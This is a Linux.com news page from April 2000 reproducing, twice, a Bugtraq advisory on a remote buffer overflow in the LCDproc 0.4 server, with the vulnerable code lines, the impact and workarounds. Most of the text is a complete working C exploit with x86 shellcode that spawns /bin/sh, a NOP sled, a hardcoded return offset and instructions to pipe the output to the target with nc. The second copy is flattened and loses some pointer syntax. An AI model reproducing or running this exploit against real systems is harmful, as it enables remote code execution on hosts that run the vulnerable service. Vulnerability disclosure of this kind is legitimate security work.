Linux.com Article DB: Remote vulnerability in LCDproc 0.4

From: Andrew Hobgood Subject: Remote vulnerability in LCDproc 0.4 To: BUGTRAQ@SECURITYFOCUS.COM

============================================================== === Title: Vulnerability in LCDproc === === Date: 20 April 2000 === === Author: Andrew Hobgood === ==============================================================

[ Note: The LCDproc maintainers have been notified of this vulnerability, ] [ and have stated that they are prepared for this advisory to be ] [ released. ]

================= === Specifics === =================

LCDproc (http://lcdproc.omnipotent.net) is a system to display system information and other data on an LCD display (or any supported display device, including curses or text). As of version 0.4, the system utilizes a client/server model for communication, and clients wishing to display data on the LCDproc host device can connect to the LCDproc server and negotiate a session.

This system is commonly used in embedded server environments and other locations where system statistics must be available quickly, but space requirements or other restrictions prevent connecting a monitor or other display unit. Also, since it must often communicate with the LCD device, it is commonly installed setuid root or setgid uucp.

While this system provides for a highly extensible means of displaying data, the protocol handling code has a few bugs with dire consequences.

The vulnerabilities in LCDproc allow an attacker to remotely execute arbitrary code or cause the LCDproc server to crash.

Improper boundary conditions exist at various locations in the code, including:

[ Note: argv[0] in this context is *not* the argv[] from main(). ]

parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]); screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id); screenlist.c:134: sprintf(str, "listen %s\n", s->id);

As well as other locations.

============== === Impact === ==============

Any system running LCDproc 0.4 or above (including the 0.4-pre series) that is susceptible to buffer overflow attacks is vulnerable. The exploit below is only for Linux/x86, and has limited attack potential, but that does not mean that the scope of the attack is limited only to that platform.

Remote access can be gained as whatever user and group that LCDproc is running as.

========================== === Temporary Solution === ==========================

Disable LCDproc, or downgrade to version 0.3 or before, prior to the client/ server implementation in 0.4.

There is also a patch included in this message which can be applied against LCDproc version 0.4-pre9 (available from the LCDproc home site at http://lcdproc.omnipotent.net).

================================ === Patch (against 0.4-pre9) === ================================

[ This patch is also available at ] [ http://web.strange.net/patches/lcdproc.20April2000.patch ]

(Patch has been attached to this message to prevent linewrapping and other such confusions.)

=============== === Exploit === ===============

[ Note: This code launches /bin/sh on the remote site. Unfortunately, this ] [ shell is execve()'ed, and inherits the stdin/stdout of the main ] [ LCDproc process, and therefore just runs /bin/sh on the remote ] [ site, instead of over the socket. Blah. I didn't feel like ] [ hacking up shellcode to do something more productive. I'm sure ] [ that someone else much more capable than myself will take care of ] [ that on my behalf. ]

/***** * lcdproc-exploit.c ***** * * LCDproc 0.4-pre9 exploit # # Andrew Hobgood * Kha0S on #LinuxOS/EFnet * * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands * on for testing). * ***** */

#include #include #include #include

#define BUFFERSIZE 269 #define NOP 0x90 #define OFFSET 0xbffff750

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh";

int main(int argc, char **argv) { char *ptr, buffer[BUFFERSIZE]; unsigned long *long_ptr, offset = OFFSET; int aux;

fprintf(stderr, "LCDproc exploit by Andrew Hobgood \n\n"); fprintf(stderr, "Usage: (%s []; cat) | nc 13666\n\n", argv[0]);

if (argc == 2) offset += atol(argv[1]);

ptr = buffer; memset(ptr, 0, sizeof(buffer)); memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16); ptr += sizeof(buffer) - strlen(shellcode) - 16; memcpy(ptr, shellcode, strlen(shellcode)); ptr += strlen(shellcode); long_ptr = (unsigned long *) ptr; for(aux=0; aux<4; aux++) *(long_ptr++) = offset; ptr = (char *) long_ptr; *ptr = '\0';

fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer)); fprintf(stderr, "Offset: 0x%lx\n\n", offset);

printf("hello\n"); fflush(stdout); sleep(1); printf("screen_add {%s}\n", buffer); fflush(stdout);

return(0); }

/*** end lcdproc-exploit.c ***/

Originally Published: Saturday, 22 April 2000	Author: Alexander Reelsen
Published to: news_enhance_security/Security News	Page: 1/1 - [Printable]
Remote vulnerability in LCDproc 0.4 A security hole in LCDproc 0.4 has been found and posted on bugtraq. A remote user can crash the lcdproc software or he can remotely exec arbitrary code.

	Page 1 of 1
From: Andrew Hobgood Subject: Remote vulnerability in LCDproc 0.4 To: BUGTRAQ@SECURITYFOCUS.COM ============================================================== === Title: Vulnerability in LCDproc === === Date: 20 April 2000 === === Author: Andrew Hobgood === ============================================================== [ Note: The LCDproc maintainers have been notified of this vulnerability, ] [ and have stated that they are prepared for this advisory to be ] [ released. ] ================= === Specifics === ================= LCDproc (http://lcdproc.omnipotent.net) is a system to display system information and other data on an LCD display (or any supported display device, including curses or text). As of version 0.4, the system utilizes a client/server model for communication, and clients wishing to display data on the LCDproc host device can connect to the LCDproc server and negotiate a session. This system is commonly used in embedded server environments and other locations where system statistics must be available quickly, but space requirements or other restrictions prevent connecting a monitor or other display unit. Also, since it must often communicate with the LCD device, it is commonly installed setuid root or setgid uucp. While this system provides for a highly extensible means of displaying data, the protocol handling code has a few bugs with dire consequences. The vulnerabilities in LCDproc allow an attacker to remotely execute arbitrary code or cause the LCDproc server to crash. Improper boundary conditions exist at various locations in the code, including: [ Note: argv[0] in this context is not the argv[] from main(). ] parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]); screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id); screenlist.c:134: sprintf(str, "listen %s\n", s->id); As well as other locations. ============== === Impact === ============== Any system running LCDproc 0.4 or above (including the 0.4-pre series) that is susceptible to buffer overflow attacks is vulnerable. The exploit below is only for Linux/x86, and has limited attack potential, but that does not mean that the scope of the attack is limited only to that platform. Remote access can be gained as whatever user and group that LCDproc is running as. ========================== === Temporary Solution === ========================== Disable LCDproc, or downgrade to version 0.3 or before, prior to the client/ server implementation in 0.4. There is also a patch included in this message which can be applied against LCDproc version 0.4-pre9 (available from the LCDproc home site at http://lcdproc.omnipotent.net). ================================ === Patch (against 0.4-pre9) === ================================ [ This patch is also available at ] [ http://web.strange.net/patches/lcdproc.20April2000.patch ] (Patch has been attached to this message to prevent linewrapping and other such confusions.) =============== === Exploit === =============== [ Note: This code launches /bin/sh on the remote site. Unfortunately, this ] [ shell is execve()'ed, and inherits the stdin/stdout of the main ] [ LCDproc process, and therefore just runs /bin/sh on the remote ] [ site, instead of over the socket. Blah. I didn't feel like ] [ hacking up shellcode to do something more productive. I'm sure ] [ that someone else much more capable than myself will take care of ] [ that on my behalf. ] /***** * lcdproc-exploit.c ***** * * LCDproc 0.4-pre9 exploit # # Andrew Hobgood * Kha0S on #LinuxOS/EFnet * * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands * on for testing). * ***** / #include #include #include #include #define BUFFERSIZE 269 #define NOP 0x90 #define OFFSET 0xbffff750 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; int main(int argc, char argv) { char ptr, buffer[BUFFERSIZE]; unsigned long long_ptr, offset = OFFSET; int aux; fprintf(stderr, "LCDproc exploit by Andrew Hobgood \n\n"); fprintf(stderr, "Usage: (%s []; cat) \| nc 13666\n\n", argv[0]); if (argc == 2) offset += atol(argv[1]); ptr = buffer; memset(ptr, 0, sizeof(buffer)); memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16); ptr += sizeof(buffer) - strlen(shellcode) - 16; memcpy(ptr, shellcode, strlen(shellcode)); ptr += strlen(shellcode); long_ptr = (unsigned long ) ptr; for(aux=0; aux<4; aux++) (long_ptr++) = offset; ptr = (char ) long_ptr; ptr = '\0'; fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer)); fprintf(stderr, "Offset: 0x%lx\n\n", offset); printf("hello\n"); fflush(stdout); sleep(1); printf("screen_add {%s}\n", buffer); fflush(stdout); return(0); } / end lcdproc-exploit.c */
	Page 1 of 1